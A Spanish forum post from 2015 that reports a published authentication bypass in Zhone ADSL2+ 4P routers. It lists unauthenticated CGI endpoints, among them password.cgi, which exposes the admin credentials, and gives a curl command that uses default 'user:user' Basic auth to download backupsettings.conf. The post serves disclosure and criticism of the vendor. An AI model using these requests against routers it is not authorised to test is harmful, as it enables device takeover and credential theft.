Obtención de privilegios roots en Zhone ADSL2+ 4P

kcdtv · 05-09-2015 11:10:11

Obtención de privilegios de administrador en la gama Zhone ADSL2+ 4P

No conocía a la marca Zhone.

Tienen una pequeña serie de CPE : products
Estos routers sufren de una grave enfermedad: además de tener una pinta que espanta hasta sus propias madres; son iguales de seguros que un router thomson ( cf Obtener los credenciales de administrador de un Thomson TWG850) big_smile
Es lo que demuestra hoy Mahmoud Khaled en vunerabiltylab.
La información fue también puesta en packet storm:

Zhone ADSL2+ 4P Authentiation Bypass / … Disclosure

¿Quieres ser root?

Puedes acceder a estas tres paginas mediante http sin conocer los credenciales

http://[LOCALHOST]:?/pvccfg.cgi
http://[LOCALHOST]:?/dnscfg.cgi
http://[LOCALHOST]:?/password.cgi  (In addition to text storage of sensitive information!)

En localhost pones la pasarela y si vas por ejemplo a password.cgi puedes conocer or re-configurar el nombre y la contraseña de administrador.
Puedes obtener los parámetros guardados en el fichero backupsettings.conf. gracias una simple petición con curl.
```
curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" 
```
( ("dXNlcjp1c2Vy" = "user:user" en base64))

Un tipo de brecha ya vistas en le pasado y que no deberíamos encontrar en una serie moderna de puntos de acceso.

Tema	Respuestas	Vistas	Ultimo mensaje
Problemas al instalar Kali Linux y solo detecta una red por champagnerolex	23	592	Hoy 19:06:47 por worldkrory
Reaver 1.6b edición comunitaria "t6x pixie dust": El renacimiento. por kcdtv	0	64	Ayer 15:51:33 por kcdtv
Instala el kernel que quieres con Linux Kernel Utilities por kcdtv	0	21	20-06-2017 02:07:34 por kcdtv
Pegado: Pegado:: AWUS036ACH (ac1200): ¿El mejor adaptador WiFi USB del mundo? por kcdtv [ 1 2 3 4 ]	94	9112	19-06-2017 16:55:28 por kcdtv
porta traseras en vodafone community ? por fabiobassa	7	140	17-06-2017 16:00:59 por kcdtv

Foro Wifi-libre.com

Anuncio

#1 05-09-2015 11:10:11